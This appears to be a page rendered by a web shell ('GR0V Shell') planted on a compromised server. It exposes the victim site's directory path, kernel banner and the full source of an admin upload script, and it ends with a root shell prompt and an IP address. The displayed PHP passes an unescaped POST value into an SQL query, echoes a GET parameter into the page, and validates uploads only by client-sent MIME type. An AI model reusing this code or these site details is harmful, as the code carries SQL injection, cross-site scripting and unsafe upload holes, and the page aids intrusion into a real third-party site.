? GR0V Shell

GR0V shell

Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/domains/happytokorea.com/public_html/backend/modules/goods/
File Upload :
Current File : /home/admin/domains/happytokorea.com/public_html/backend/modules/goods/upload_zip.php

<?
session_start();
require_once('../../../config.php');
require_once('../../../libs/MySql.php');
require_once('../../../libs/function.php');
require_once('../../../libs/global.php');
require_once('../../../libs/backoff_ajax.php');		
require_once('../../../libs/backoff.php');		
require_once('../../modules/users/mod_user.php');
$db=new MySql;
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<HEAD>
<TITLE><? echo $cfg['site_name'];?></TITLE>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<META content="" name=Keywords>
<META content="<?echo $cfg['site_name'];?>" name="Description">
<META content="<?echo $cfg['site_name'];?>" name="Author">
<META content="<?echo $cfg['site_name'];?>" name="Copyright">


<title>Upload File</title>
</head>


<?php 
//Upload รูป 
if(!$_POST)
{
?>
<body>
rar ขนาดไม่เกิน 10 mb
 <div style="padding:10px;">
<form method="post" action="<? echo $_SERVER['PHP_SELF']?>" enctype="multipart/form-data">
<INPUT  type="file" name="photo">
<input name="tour_id" type="hidden" id="tour_id" value="<?=$_GET['tour_id']?>" />
<br>
<br>
<BUTTON ID=btnOK name="send" value="send"  type=submit tabIndex=40>บันทึก</BUTTON>
<BUTTON ID=btnCancel  type=reset tabIndex=45 onClick="window.close();">ยกเลิก</BUTTON>
</form>
</div>
<?
}
else
{
$db=new MySql;
		$filename=$_FILES['photo']['name'];
		$filetype=$_FILES['photo']['type'];
 		$filetmp=$_FILES['photo']['tmp_name'];
$pic="tour-00{$_POST[tour_id]}".Random_Int(4).date('dmYHism',time());
if ( $filetype == "application/octet-stream" ){
$filename1=$pic.".rar";
}
	
else{  
echo"<script language=\"javascript\">
alert('ไม่ใช่ไฟล์ที่กำหนด...');
 window.close();   
</script>";
exit();
}
if($_FILES['photo']['size']>10240000){

echo"<script language=\"javascript\">
alert('ไฟล์ใหญ่กว่ากำหนด...{$_FILES['photo']['size']}');
 window.close();   
</script>";
exit();

}

				if($filename!=""){
					$data=Array(
						'fileload'=>$filename1,
						
						);
				$db->Update('tour',$data,"WHERE id='{$_POST[tour_id]}'");
					move_uploaded_file($filetmp,"../../../tour/rar/$filename1"); 

				}
				
				
	
echo"<script language=\"javascript\">
alert('บันทึกเรียบร้อย...');
 window.close();   
</script>";

}//ปิด send
?>

T1KUS90T
  root-grov@210.1.60.28:~$